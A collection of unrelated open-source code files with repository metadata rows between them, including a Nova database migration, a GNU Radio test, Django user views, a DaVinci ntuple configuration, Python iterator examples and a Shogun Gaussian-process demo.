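    """Install Node.js from source, then install 'express' globally."""
    install_from_source(version=version)
    install_package('express')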
| bsd-2-clause | 8,728,828,897,423,888,000 | 24.071429 | 87 | 0.585292 | false | 3.862448 | false | false | false |
plumgrid/plumgrid-nova | nova/db/sqlalchemy/migrate_repo/versions/147_no_service_zones.py | 10 | 4133 | # Copyright 2012 OpenStack Foundation
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
from sqlalchemy import String, Column, MetaData, Table, select
""" Remove availability_zone column from services model and replace with
aggregate based zone."""
def upgrade(migrate_engine):
meta = MetaData()
meta.bind = migrate_engine
services = Table('services', meta, autoload=True)
aggregates = Table('aggregates', meta, autoload=True)
aggregate_metadata = Table('aggregate_metadata', meta, autoload=True)
# migrate data
record_list = list(services.select().execute())
for rec in record_list:
# Only need to migrate nova-compute availability_zones
if rec['binary'] != 'nova-compute':
continue
# if zone doesn't exist create
result = aggregate_metadata.select().where(
aggregate_metadata.c.key == 'availability_zone').where(
aggregate_metadata.c.value == rec['availability_zone']).execute()
result = [r for r in result]
if len(result) > 0:
agg_id = result[0].aggregate_id
else:
agg = aggregates.insert()
result = agg.execute({'name': rec['availability_zone']})
agg_id = result.inserted_primary_key[0]
row = aggregate_metadata.insert()
row.execute({'created_at': rec['created_at'],
'updated_at': rec['updated_at'],
'deleted_at': rec['deleted_at'],
'deleted': rec['deleted'],
'key': 'availability_zone',
'value': rec['availability_zone'],
'aggregate_id': agg_id,
})
# add host to zone
agg_hosts = Table('aggregate_hosts', meta, autoload=True)
num_hosts = agg_hosts.count().where(
agg_hosts.c.host == rec['host']).where(
agg_hosts.c.aggregate_id == agg_id).execute().scalar()
if num_hosts == 0:
agg_hosts.insert().execute({'host': rec['host'],
'aggregate_id': agg_id})
services.drop_column('availability_zone')
def downgrade(migrate_engine):
meta = MetaData()
meta.bind = migrate_engine
services = Table('services', meta, autoload=True)
aggregate_metadata = Table('aggregate_metadata', meta, autoload=True)
agg_hosts = Table('aggregate_hosts', meta, autoload=True)
availability_zone = Column('availability_zone', String(255),
default='nova')
services.create_column(availability_zone)
# Migrate data back
# NOTE(jhesketh): This needs to be done with individual inserts as multiple
# results in an update sub-query do not work with MySQL. See bug/1207309.
record_list = list(services.select().execute())
for rec in record_list:
# Only need to update nova-compute availability_zones
if rec['binary'] != 'nova-compute':
continue
result = select([aggregate_metadata.c.value],
from_obj=aggregate_metadata.join(
agg_hosts,
agg_hosts.c.aggregate_id == aggregate_metadata.c.aggregate_id
)
).where(
aggregate_metadata.c.key == 'availability_zone'
).where(
agg_hosts.c.aggregate_id == aggregate_metadata.c.aggregate_id
).where(
agg_hosts.c.host == rec['host']
)
services.update().values(
availability_zone=list(result.execute())[0][0]
).where(
services.c.id == rec['id']
)
| apache-2.0 | -5,195,159,218,413,275,000 | 39.126214 | 79 | 0.598355 | false | 4.260825 | false | false | false |
smunaut/gnuradio | gr-analog/python/analog/qa_probe_avg_mag_sqrd.py | 57 | 3007 | #!/usr/bin/env python
#
# Copyright 2012,2013 Free Software Foundation, Inc.
#
# This file is part of GNU Radio
#
# GNU Radio is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 3, or (at your option)
# any later version.
#
# GNU Radio is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with GNU Radio; see the file COPYING. If not, write to
# the Free Software Foundation, Inc., 51 Franklin Street,
# Boston, MA 02110-1301, USA.
#
import math
from gnuradio import gr, gr_unittest, analog, blocks
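# Reference models for the probes under test: a single-pole IIR average of the
# magnitude squared, y[n] = alpha*|x[n]|^2 + (1 - alpha)*y[n-1], seeded with 0.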
def avg_mag_sqrd_c(x, alpha):
y = [0,]
for xi in x:
tmp = alpha*(xi.real*xi.real + xi.imag*xi.imag) + (1-alpha)*y[-1]
y.append(tmp)
return y
def avg_mag_sqrd_f(x, alpha):
y = [0,]
for xi in x:
tmp = alpha*(xi*xi) + (1-alpha)*y[-1]
y.append(tmp)
return y
class test_probe_avg_mag_sqrd(gr_unittest.TestCase):
def setUp(self):
self.tb = gr.top_block()
def tearDown(self):
self.tb = None
def test_c_001(self):
alpha = 0.0001
src_data = [1.0+1.0j, 2.0+2.0j, 3.0+3.0j, 4.0+4.0j, 5.0+5.0j,
6.0+6.0j, 7.0+7.0j, 8.0+8.0j, 9.0+9.0j, 10.0+10.0j]
expected_result = avg_mag_sqrd_c(src_data, alpha)[-1]
src = blocks.vector_source_c(src_data)
op = analog.probe_avg_mag_sqrd_c(0, alpha)
self.tb.connect(src, op)
self.tb.run()
result_data = op.level()
self.assertAlmostEqual(expected_result, result_data, 5)
def test_cf_002(self):
alpha = 0.0001
src_data = [1.0+1.0j, 2.0+2.0j, 3.0+3.0j, 4.0+4.0j, 5.0+5.0j,
6.0+6.0j, 7.0+7.0j, 8.0+8.0j, 9.0+9.0j, 10.0+10.0j]
expected_result = avg_mag_sqrd_c(src_data, alpha)[0:-1]
src = blocks.vector_source_c(src_data)
op = analog.probe_avg_mag_sqrd_cf(0, alpha)
dst = blocks.vector_sink_f()
self.tb.connect(src, op)
self.tb.connect(op, dst)
self.tb.run()
result_data = dst.data()
self.assertComplexTuplesAlmostEqual(expected_result, result_data, 5)
def test_f_003(self):
alpha = 0.0001
src_data = [1.0, 2.0, 3.0, 4.0, 5.0,
6.0, 7.0, 8.0, 9.0, 10.0]
expected_result = avg_mag_sqrd_f(src_data, alpha)[-1]
src = blocks.vector_source_f(src_data)
op = analog.probe_avg_mag_sqrd_f(0, alpha)
self.tb.connect(src, op)
self.tb.run()
result_data = op.level()
self.assertAlmostEqual(expected_result, result_data, 5)
if __name__ == '__main__':
gr_unittest.run(test_probe_avg_mag_sqrd, "test_probe_avg_mag_sqrd.xml")
| gpl-3.0 | 2,704,701,076,577,412,000 | 29.683673 | 76 | 0.602261 | false | 2.855651 | true | false | false |
unicefuganda/mics | survey/views/users.py | 1 | 4896 | import json
from django.http import HttpResponse, HttpResponseRedirect
from django.shortcuts import render
from django.contrib import messages
from django.contrib.auth.models import User
from django.contrib.auth.decorators import login_required, permission_required
from survey.investigator_configs import *
from survey.forms.users import *
from survey.models.users import UserProfile
from survey.views.custom_decorators import permission_required_for_perm_or_current_user
def _add_error_messages(userform, request, action_str='registered'):
error_message = "User not %s. "%action_str
messages.error(request, error_message + "See errors below.")
def _process_form(userform, request, action_success="registered", redirect_url="/users/new/"):
if userform.is_valid():
userform.save()
messages.success(request, "User successfully %s." % action_success)
return HttpResponseRedirect(redirect_url)
_add_error_messages(userform, request, action_success)
return None
@login_required
@permission_required('auth.can_view_users')
def new(request):
userform = UserForm()
response = None
if request.method == 'POST':
userform = UserForm(request.POST)
response = _process_form(userform, request)
template_variables = {'userform': userform,
'country_phone_code':COUNTRY_PHONE_CODE,
'action': "/users/new/",
'id': "create-user-form",
'class': "user-form",
'button_label': "Create",
'loading_text': "Creating...",
'title' : 'New User'}
return response or render(request, 'users/new.html', template_variables)
def check_mobile_number(mobile_number):
response = UserProfile.objects.filter(mobile_number=mobile_number).exists()
return HttpResponse(json.dumps(not response), content_type="application/json")
def check_user_attribute(**kwargs):
response = User.objects.filter(**kwargs).exists()
return HttpResponse(json.dumps(not response), content_type="application/json")
@permission_required('auth.can_view_users')
def index(request):
if request.GET.has_key('mobile_number'):
return check_mobile_number(request.GET['mobile_number'])
if request.GET.has_key('username'):
return check_user_attribute(username=request.GET['username'])
if request.GET.has_key('email'):
return check_user_attribute(email=request.GET['email'])
return render(request, 'users/index.html', { 'users' : User.objects.all(),
'request': request})
@permission_required_for_perm_or_current_user('auth.can_view_users')
def edit(request, user_id):
user = User.objects.get(pk=user_id)
initial={'mobile_number': UserProfile.objects.get(user=user).mobile_number}
userform = EditUserForm(user= request.user, instance=user, initial=initial)
response = None
if request.method == 'POST':
userform = EditUserForm(data=request.POST, user= request.user, instance=user, initial=initial)
response = _process_form(userform, request, 'edited', '/users/'+ str(user_id)+'/edit/')
context_variables = {'userform': userform,
'action' : '/users/%s/edit/'%user_id,
'id': 'edit-user-form','class': 'user-form', 'button_label' : 'Save',
'loading_text' : 'Saving...',
'country_phone_code': COUNTRY_PHONE_CODE,
'title': 'Edit User'}
return response or render(request, 'users/new.html', context_variables)
@permission_required('auth.can_view_users')
def show(request, user_id):
user = User.objects.filter(id=user_id)
if not user.exists():
messages.error(request, "User not found.")
return HttpResponseRedirect("/users/")
return render(request, 'users/show.html', {'the_user': user[0], 'cancel_url': '/users/'})
def _set_is_active(user, status, request):
action_str = "re-" if status else "de"
user.is_active = status
user.save()
messages.success(request, "User %s successfully %sactivated."%(user.username, action_str))
def _activate(request, user_id, status):
user = User.objects.filter(id=user_id)
if not user.exists():
messages.error(request, "User not found.")
return HttpResponseRedirect("/users/")
user = user[0]
if user.is_active is not status:
_set_is_active(user, status, request)
return HttpResponseRedirect("/users/")
@permission_required('auth.can_view_users')
def deactivate(request, user_id):
return _activate(request, user_id, status=False)
@permission_required('auth.can_view_users')
def activate(request, user_id):
return _activate(request, user_id, status=True)
| bsd-3-clause | 8,590,943,829,444,842,000 | 41.206897 | 102 | 0.647467 | false | 3.885714 | false | false | false |
daVinci1980/antebuild | internals/utils.py | 1 | 1110 |
import inspect
import os
import runpy
import specs
# -------------------------------------------------------------------------------------------------
def fixpath(_path, _opts):
return os.path.normpath(os.path.join(_opts.pathPrefix, _path))
# -------------------------------------------------------------------------------------------------
def include(_path):
cwd = os.getcwd()
try:
os.chdir(os.path.dirname(os.path.abspath(_path)))
return _includeInternal(_path)
except IOError:
return _includeInternal(_path + ".ab")
finally:
os.chdir(cwd)
# -------------------------------------------------------------------------------------------------
def _includeInternal(_path):
initGlobals = specs.getProjectGroupDict()
initGlobals['include'] = include
ignoreClasses = [c for c in initGlobals.itervalues() if inspect.isclass(c)]
mod = runpy.run_path(_path, initGlobals)
filteredMod = {}
for k, v in mod.iteritems():
if not inspect.isclass(v) or v not in ignoreClasses:
filteredMod[k] = v
return filteredMod
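# Illustrative usage (hypothetical path): definitions = include('specs/libfoo.ab')
# evaluates that build file and returns a dict of the names it defined, with the
# injected spec classes themselves filtered back out.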
| bsd-3-clause | 4,108,960,350,575,440,400 | 29 | 99 | 0.474775 | false | 4.663866 | false | false | false |
codedcolors/pygrow | grow/pods/controllers/tags/builtins.py | 1 | 5453 | from datetime import datetime
from grow.common import utils
from grow.pods import locales as locales_lib
from grow.pods.collectionz import collectionz
import collections
import csv as csv_lib
import itertools
import jinja2
import json as json_lib
import markdown
import re
@utils.memoize_tag
def categories(collection=None, collections=None, reverse=None, order_by=None,
_pod=None):
if isinstance(collection, collectionz.Collection):
collection = collection
elif isinstance(collection, basestring):
collection = _pod.get_collection(collection)
else:
text = '{} must be a Collection instance or a collection path, found: {}.'
raise ValueError(text.format(collection, type(collection)))
category_list = collection.list_categories()
def order_func(doc):
return category_list.index(doc.category)
docs = [doc for doc in collection.list_docs(reverse=reverse)]
docs = sorted(docs, key=order_func)
items = itertools.groupby(docs, key=order_func)
return ((category_list[index], pages) for index, pages in items)
def LocaleIterator(iterator, locale):
locale = str(locale)
for i, line in enumerate(iterator):
if i == 0 or line.startswith(locale):
yield line
_no_locale = '__no_locale'
@utils.memoize_tag
def csv(path, locale=_no_locale, _pod=None):
fp = _pod.open_file(path)
if locale is not _no_locale:
fp = LocaleIterator(fp, locale=locale)
rows = []
for row in csv_lib.DictReader(fp):
data = {}
for header, cell in row.iteritems():
if cell is None:
cell = ''
data[header] = cell.decode('utf-8')
rows.append(data)
return rows
@utils.memoize_tag
def docs(collection, locale=None, order_by=None, _pod=None):
collection = _pod.get_collection(collection)
return collection.list_docs(locale=locale, order_by=order_by)
@utils.memoize_tag
def statics(pod_path, locale=None, _pod=None):
return _pod.list_statics(pod_path, locale=locale)
def markdown_filter(value):
try:
if isinstance(value, unicode):
value = value.decode('utf-8')
return markdown.markdown(value)
except UnicodeEncodeError:
return markdown.markdown(value)
_slug_regex = re.compile(r'[\t !"#$%&\'()*\-/<=>?@\[\\\]^_`{|},.]+')
def slug_filter(value):
result = []
for word in _slug_regex.split(value.lower()):
if word:
result.append(word)
return unicode(u'-'.join(result))
@utils.memoize_tag
def static(path, locale=None, _pod=None):
return _pod.get_static(path, locale=locale)
class Menu(object):
def __init__(self):
self.items = collections.OrderedDict()
def build(self, nodes):
self._recursive_build(self.items, None, nodes)
def iteritems(self):
return self.items.iteritems()
def _recursive_build(self, tree, parent, nodes):
children = [n for n in nodes if n.parent == parent]
for child in children:
tree[child] = collections.OrderedDict()
self._recursive_build(tree[child], child, nodes)
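# Menu.build() turns the flat, ordered list of docs into a nested OrderedDict
# tree: each key is a doc whose value holds that doc's children, matched by
# comparing every node's `parent` attribute against the current subtree root.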
@utils.memoize_tag
def nav(collection=None, locale=None, _pod=None):
collection_obj = _pod.get_collection('/content/' + collection)
results = collection_obj.list_docs(order_by='order', locale=locale)
menu = Menu()
menu.build(results)
return menu
@utils.memoize_tag
def breadcrumb(doc, _pod=None):
pass
@utils.memoize_tag
def url(pod_path, locale=None, _pod=None):
doc = _pod.get_doc(pod_path, locale=locale)
return doc.url
@utils.memoize_tag
def get_doc(pod_path, locale=None, _pod=None):
return _pod.get_doc(pod_path, locale=locale)
@jinja2.contextfilter
def render_filter(ctx, template):
if isinstance(template, basestring):
template = ctx.environment.from_string(template)
return template.render(ctx)
@jinja2.contextfilter
def parsedatetime_filter(ctx, date_string, string_format):
return datetime.strptime(date_string, string_format)
@jinja2.contextfilter
def deeptrans(ctx, obj):
return _deep_gettext(ctx, obj)
@jinja2.contextfilter
def jsonify(ctx, obj, *args, **kwargs):
return json_lib.dumps(obj, *args, **kwargs)
def _deep_gettext(ctx, fields):
if isinstance(fields, dict):
new_dct = {}
for key, val in fields.iteritems():
if isinstance(val, (dict, list, set)):
new_dct[key] = _deep_gettext(ctx, val)
elif isinstance(val, basestring):
new_dct[key] = _gettext_alias(ctx, val)
else:
new_dct[key] = val
return new_dct
elif isinstance(fields, (list, set)):
for i, val in enumerate(fields):
if isinstance(val, (dict, list, set)):
fields[i] = _deep_gettext(ctx, val)
elif isinstance(val, basestring):
fields[i] = _gettext_alias(ctx, val)
else:
fields[i] = val
return fields
def _gettext_alias(__context, *args, **kwargs):
return __context.call(__context.resolve('gettext'), *args, **kwargs)
@utils.memoize_tag
def yaml(path, _pod):
fields = utils.parse_yaml(_pod.read_file(path), pod=_pod)
return utils.untag_fields(fields)
@utils.memoize_tag
def json(path, _pod):
fp = _pod.open_file(path)
return json_lib.load(fp)
def date(datetime_obj=None, _pod=None, **kwargs):
_from = kwargs.get('from', None)
if datetime_obj is None:
datetime_obj = datetime.now()
elif isinstance(datetime_obj, basestring) and _from is not None:
datetime_obj = datetime.strptime(datetime_obj, _from)
return datetime_obj
@utils.memoize_tag
def locales(codes, _pod=None):
return locales_lib.Locale.parse_codes(codes)
| mit | 6,887,888,150,770,782,000 | 24.721698 | 78 | 0.686411 | false | 3.325 | false | false | false |
Williams224/davinci-scripts | LambdabNTupleMaker.py | 1 | 5745 | from Gaudi.Configuration import *
from Configurables import DaVinci
#from Configurables import AlgTool
from Configurables import GaudiSequencer
MySequencer = GaudiSequencer('Sequence')
DaVinci.DDDBtag='dddb-20120831'
DaVinci.CondDBtag='sim-20121025-vc-md100'
simulation=True
#only for mdst
#from Configurables import EventNodeKiller
#eventNodeKiller = EventNodeKiller('DAQkiller')
#eventNodeKiller.Nodes = ['DAQ','pRec']
#MySequencer.Members+=[eventNodeKiller]
#################################################################
#Rerun with stripping21 applied
if simulation:
from StrippingConf.Configuration import StrippingConf, StrippingStream
from StrippingSettings.Utils import strippingConfiguration
from StrippingArchive.Utils import buildStreams
from StrippingArchive import strippingArchive
from Configurables import PhysConf
PhysConf().CaloReProcessing=True
stripping="stripping21"
config=strippingConfiguration(stripping)
archive=strippingArchive(stripping)
streams=buildStreams(stripping=config,archive=archive)
MyStream= StrippingStream("MyStream")
MyLines= ["StrippingB2XEtaLb2pKetapLine"]
for stream in streams:
for line in stream.lines:
if line.name() in MyLines:
MyStream.appendLines( [ line ])
from Configurables import ProcStatusCheck
filterBadEvents=ProcStatusCheck()
sc=StrippingConf( Streams= [ MyStream ],
MaxCandidates = 2000,
AcceptBadEvents = False,
BadEventSelection = filterBadEvents)
DaVinci().appendToMainSequence([sc.sequence()])
##################Creating NTuples#####################################
from Configurables import DecayTreeTuple
from Configurables import TupleToolL0Calo
from DecayTreeTuple.Configuration import *
tuple=DecayTreeTuple()
tuple.Decay="[Lambda_b0 -> ^p+ ^K- ^(eta_prime -> ^pi- ^pi+ ^gamma)]CC"
tuple.Branches={"Lambda_b0":"[Lambda_b0 -> p+ K- (eta_prime -> pi- pi+ gamma)]CC"}
tuple.Inputs=["Phys/B2XEtaLb2pKetapLine/Particles"]
tuple.addTool(TupleToolL0Calo())
tuple.TupleToolL0Calo.TriggerClusterLocation="/Event/Trig/L0/Calo"
tuple.TupleToolL0Calo.WhichCalo="HCAL"
tuple.ToolList += [
"TupleToolGeometry"
, "TupleToolDira"
, "TupleToolAngles"
# , "TupleToolL0Calo"
, "TupleToolPid"
, "TupleToolKinematic"
, "TupleToolPropertime"
, "TupleToolPrimaries"
, "TupleToolEventInfo"
, "TupleToolTrackInfo"
, "TupleToolVtxIsoln"
, "TupleToolPhotonInfo"
, "TupleToolMCTruth"
, "TupleToolMCBackgroundInfo"
# , "MCTupleTOolHierachy"
, "TupleToolCaloHypo"
, "TupleToolTrackIsolation"
#, "TupleToolTagging" not used in microdst
]
#from Configurables import TupleToolMCTruth
#from TupleToolMCTruth.Configuration import *
#tuple.addTool(TupleToolMCTruth,name="TruthM")
#tuple.ToolList+= [ "TupleToolMCTruth/TruthM"]
#tuple.TruthM.ToolList = ["MCTupleToolHierachy/Hierachy"]
#tuple.TruthM.addTool(MCTupleToolHierachy,name="Hierachy")
#tuple.TupleToolMCTruth.addTool(MCTupleToolKinematic,name="MCTupleToolKinematic")
#tuple.TupleToolMCTruth.addTool(MCTupleToolHierachy,name="MCTupleToolHierachy")
#tuple.TupleToolMCTruth.addTool(MCTupleToolPID,name="MCTupleToolPID")
#####Look at adding branches##############
tuple.addTool(TupleToolDecay,name="Lambda_b0")
from Configurables import TupleToolDecayTreeFitter
tuple.Lambda_b0.addTool(TupleToolDecayTreeFitter("PVFit"))
tuple.Lambda_b0.PVFit.Verbose=True
tuple.Lambda_b0.PVFit.constrainToOriginVertex=True
tuple.Lambda_b0.PVFit.daughtersToConstrain = ["p+","K-","eta_prime"]
tuple.Lambda_b0.ToolList+=["TupleToolDecayTreeFitter/PVFit"]
from Configurables import TupleToolTISTOS
tistos=tuple.Lambda_b0.addTupleTool(TupleToolTISTOS, name="TupleToolTISTOS")
tistos.VerboseL0=True
tistos.VerboseHlt1=True
tistos.VerboseHlt2=True
tistos.TriggerList=["L0PhotonDecision",
"L0ElectronDecision",
"Hlt1TrackPhotonDecision",
"Hlt1TrackAllL0Decision",
"Hlt1TrackMuonDecision",
"Hlt1TrackForwardPassThroughDecision",
"Hlt1TrackForwardPassThroughLooseDecision",
"Hlt1SingleElectronNoIPDecision",
"L0HadronDecision",
"L0LocalPi0Decision",
"L0GlobalPi0Decision",
"L0MuonDecision",
"Hlt2Topo2BodyBBDTDecision",
"Hlt2Topo3BodyBBDTDecision",
"Hlt2Topo4BodyBBDTDecision",
"Hlt2RadiativeTopoTrackTOSDecision",
"Hlt2RadiativeTopoPhotonL0Decision",
"Hlt2TopoRad2BodyBBDTDecision",
"Hlt2TopoRad2plus1BodyBBDTDecision",
"Hlt2Topo2BodySimpleDecision",
"Hlt2Topo3BodySimpleDecision",
"Hlt2Topo4BodySimpleDecision"]
etuple=EventTuple()
etuple.ToolList=["TupleToolEventInfo"]
from Configurables import MCDecayTreeTuple
mctuple=MCDecayTreeTuple("mctuple")
mctuple.ToolList+=["MCTupleToolKinematic","MCTupleToolReconstructed","MCTupleToolHierarchy","MCTupleToolDecayType","MCTupleToolPID"]
mctuple.Decay="[Lambda_b0 -> ^(p+) ^(K-) ^(eta_prime -> ^pi- ^pi+ ^gamma)]CC"
MySequencer.Members.append(etuple)
MySequencer.Members.append(tuple)
MySequencer.Members.append(mctuple)
DaVinci().InputType='DST'
DaVinci().UserAlgorithms+=[MySequencer]
DaVinci().TupleFile="Output.root"
DaVinci().HistogramFile="histos.root"
DaVinci().DataType='2012'
DaVinci().EvtMax=-1
DaVinci().PrintFreq=1000
DaVinci().MoniSequence=[tuple]
DaVinci().Simulation=simulation
| mit | -9,160,977,961,897,626,000 | 32.596491 | 132 | 0.694865 | false | 3.186356 | true | false | false |
MediaKraken/MediaKraken_Deployment | source/common/common_serial.py | 1 | 2296 | """
Copyright (C) 2015 Quinn D Granfor <[email protected]>
This program is free software; you can redistribute it and/or
modify it under the terms of the GNU General Public License
version 2, as published by the Free Software Foundation.
This program is distributed in the hope that it will be useful, but
WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
General Public License version 2 for more details.
You should have received a copy of the GNU General Public License
version 2 along with this program; if not, write to the Free
Software Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston,
MA 02110-1301, USA.
"""
import time
from kivy.utils import platform
# import the pyserial library for use in rs232c communications
if platform != 'android':
import serial
class CommonSerial:
"""
Class for interfacing via serial devices
"""
def __init__(self, dev_port='/dev/ttyUSB1', dev_baudrate=9600,
dev_parity=serial.PARITY_ODD,
dev_stopbits=serial.STOPBITS_TWO,
dev_bytesize=serial.SEVENBITS):
"""
Open serial device for read/write
"""
self.serial_device = serial.Serial(port=dev_port,
baudrate=dev_baudrate,
parity=dev_parity,
stopbits=dev_stopbits,
bytesize=dev_bytesize
)
        if not self.serial_device.isOpen():
            self.serial_device.open()
def com_serial_read_device(self):
"""
Read data from serial device
"""
time.sleep(1)
read_data = ''
while self.serial_device.inWaiting() > 0:
read_data += self.serial_device.read(1)
return read_data
def com_serial_close_device(self):
"""
Close serial device
"""
self.serial_device.close()
def com_serial_write_device(self, message):
"""
Send data to serial device
"""
self.serial_device.write(message)
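# ---------------------------------------------------------------------------
# Illustrative usage sketch (assumes a device is attached; the port, baud rate
# and command string below are example values only).
if __name__ == '__main__':
    dev = CommonSerial(dev_port='/dev/ttyUSB1', dev_baudrate=9600)
    dev.com_serial_write_device('status\r\n')
    print(dev.com_serial_read_device())
    dev.com_serial_close_device()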
| gpl-3.0 | -3,219,449,462,611,585,500 | 31.275362 | 69 | 0.574042 | false | 4.510806 | false | false | false |
rajendrauppal/coding-interview | programming_languages/Python/iterator.py | 1 | 2933 |
# for loop for iterating a list
print("iterate a list")
for i in [1, 2, 3, 4]:
print(i)
# for loop for iterating a string
print("iterate a string")
for c in "iteratable":
print(c)
# for loop for iterating a dictionary
print("iterate a dictionary")
for k in {"a": 1, "b": 2}:
print(k)
# for loop for iterating a file line by line
print("iterate a file")
for line in open("input.txt"):
print(line)
# list, string, dict, file stream are called iterable objects in python.
# built-in functions use these iterables
s = ",".join(["a", "b", "c"])
print(s)
d = ",".join({"x": 1, "y": 2})
print(d)
print(list("iterable"))
print(list({"x": 1, "y": 2}))
x = iter([1, 2, 3])
print(x.next())
print(x.next())
print(x.next())
# print(x.next()) # raises StopIteration
# good interview question
# implement your own xrange function
class yrange:
def __init__(self, n):
self.n = n
self.i = 0
def __iter__(self):
# __iter__ method makes an object iterable
# iter function calls __iter__ method behind the scenes
# the return value of __iter__ is an iterator
# it should implement next() method and raise StopIteration
# when there are no more elements.
return self
def next(self):
if self.i < self.n:
i = self.i
self.i += 1
return i
else:
raise StopIteration()
# lets try yrange
y = yrange(3)
print(y.next())
print(y.next())
print(y.next())
# print(y.next()) # raises StopIteration
print(list(yrange(5)))
print(sum(yrange(5)))
# good interview question
# implement reverse iterator
class rev_iter:
def __init__(self, iterable):
self.i = len(iterable) - 1
self.iterable = iterable
def __iter__(self):
return self
def next(self):
if self.i >= 0:
i = self.iterable[self.i]
self.i -= 1
return i
else:
raise StopIteration()
r = rev_iter([1, 2, 3, 4])
print(r.next())
print(r.next())
print(r.next())
print(r.next())
# print(r.next()) # StopIteration
# THE ITERATION PROTOCOL
# in python, the iterator objects are required to implement
# these two methods:
# __iter__ returns the iterator object itself.
# __next__ returns next value from the iterator. if there is no
# more items, it should raise StopIteration exception.
# lets implement a Counter iteratable class
class Counter(object):
def __init__(self, low, high):
self.current = low
self.high = high
def __iter__(self):
return self
def next(self):
if self.current <= self.high:
i = self.current
self.current += 1
return i
else:
raise StopIteration()
c = Counter(5, 10)
for i in c:
print(i)
| mit | 8,716,354,372,421,319,000 | 21.845528 | 72 | 0.568019 | false | 3.479241 | false | false | false |
daohu527/leetcode_learning | 676. Implement Magic Dictionary/code.py | 1 | 1299 | class MagicDictionary(object):
def __init__(self):
"""
Initialize your data structure here.
"""
self.table = {}
def buildDict(self, dict):
"""
Build a dictionary through a list of words
:type dict: List[str]
:rtype: void
"""
for v in dict:
n = len(v)
if n in self.table:
self.table[n].append(v)
else:
self.table[n] = [v]
def search(self, word):
"""
Returns if there is any word in the trie that equals to the given word after modifying exactly one character
:type word: str
:rtype: bool
"""
n = len(word)
if n in self.table:
for v in self.table[n]:
if self.cmp(v, word, n):
return True
return False
def cmp(self, p, q, n):
res = 0
if p == q:
return False
for i in range(n):
if p[i] != q[i]:
res += 1
if res > 1:
return False
return True
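# Design note: words are bucketed by length in self.table, so search() only has
# to compare the query against stored words of the same length and can stop as
# soon as more than one character differs.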
# Your MagicDictionary object will be instantiated and called as such:
# obj = MagicDictionary()
# obj.buildDict(dict)
# param_2 = obj.search(word) | gpl-3.0 | 4,621,180,226,200,586,000 | 24.490196 | 116 | 0.468822 | false | 4.245098 | false | false | false |
arasuarun/shogun | examples/undocumented/python_modular/graphical/regression_gaussian_process_modelselection.py | 26 | 2694 | #!/usr/bin/env python
from numpy import *
from pylab import plot, show, legend, fill_between, figure, subplot, title
def regression_gaussian_process_modelselection (n=100, n_test=100, \
x_range=5, x_range_test=10, noise_var=0.4):
from modshogun import RealFeatures, RegressionLabels
from modshogun import GaussianKernel
from modshogun import GradientModelSelection, ModelSelectionParameters
from modshogun import GaussianLikelihood, ZeroMean, \
ExactInferenceMethod, GaussianProcessRegression, GradientCriterion, \
GradientEvaluation
# easy regression data: one dimensional noisy sine wave
X_train = random.rand(1,n)*x_range
X_test = array([[float(i)/n_test*x_range_test for i in range(n_test)]])
y_test = sin(X_test)
y_train = sin(X_train)+random.randn(n)*noise_var
# shogun representation
labels = RegressionLabels(y_train[0])
feats_train = RealFeatures(X_train)
feats_test = RealFeatures(X_test)
# GP specification
kernel = GaussianKernel(10, 0.05)
mean = ZeroMean()
likelihood = GaussianLikelihood(0.8)
inf = ExactInferenceMethod(kernel, feats_train, mean, labels, likelihood)
inf.set_scale(2.5)
gp = GaussianProcessRegression(inf)
means = gp.get_mean_vector(feats_test)
variances = gp.get_variance_vector(feats_test)
# plot results
figure()
subplot(2, 1, 1)
title('Initial parameter\'s values')
plot(X_train[0], y_train[0], 'bx') # training observations
plot(X_test[0], y_test[0], 'g-') # ground truth of test
plot(X_test[0], means, 'r-') # mean predictions of test
fill_between(X_test[0], means-1.96*sqrt(variances),
means+1.96*sqrt(variances), color='grey')
legend(["training", "ground truth", "mean predictions"])
# evaluate our inference method for its derivatives
grad = GradientEvaluation(gp, feats_train, labels, GradientCriterion(), False)
grad.set_function(inf)
# handles all of the above structures in memory
grad_search = GradientModelSelection(grad)
# search for best parameters
best_combination = grad_search.select_model(True)
# outputs all result and information
best_combination.apply_to_machine(gp)
means = gp.get_mean_vector(feats_test)
variances = gp.get_variance_vector(feats_test)
# plot results
subplot(2, 1, 2)
title('Selected by gradient search parameter\'s values')
plot(X_train[0], y_train[0], 'bx') # training observations
plot(X_test[0], y_test[0], 'g-') # ground truth of test
plot(X_test[0], means, 'r-') # mean predictions of test
fill_between(X_test[0], means-1.96*sqrt(variances),
means+1.96*sqrt(variances), color='grey')
legend(["training", "ground truth", "mean predictions"])
show()
if __name__=='__main__':
regression_gaussian_process_modelselection()
| gpl-3.0 | 560,818,344,550,251,460 | 27.967742 | 79 | 0.726429 | false | 3.092997 | true | false | false |
sandiegodata/age-friendly-communities | users/rashmi/income_stats.py | 1 | 8149 | #! /usr/bin/env python
################################################################################
#
# income_stats.py
#
# Script to extract income information specific to individuals 55 and older from
# the ACS archive containing it and to output the same on a per SRA and zipcode
# basis for the SD county
#
# Dependencies:
#
# Data files must be present in the current working directory
#
# Usage:
#
# python income_stats.py
#
import sys
import os
import shutil
import re
import pandas as pd
import numpy as np
import pprint
from zipfile import ZipFile
from collections import defaultdict, OrderedDict
import sdpyutils as sdpy
#
# GLOBALS
#
# current working directory
CWD = os.getcwd()
TMPDIR = os.path.join(CWD,"tmp")
# data file(s)
VERSION = "2015"
DATAZIP = "aff_B17024_sd_county_" + VERSION + ".zip"
# output file(s)
OUT_CSV1 = "B17024_estimates_sd_county_55_over_" + VERSION + ".csv"
OUT_CSV2 = "low_income_data_sd_county_" + VERSION + ".csv"
#
# Removes the temp directory and its contents
#
def cleanup(doCleanup):
# Cleanup the temp directory only if we created it here
if doCleanup:
if os.path.exists(TMPDIR):
shutil.rmtree("tmp")
doCleanup = False
#
# processMetaData
#
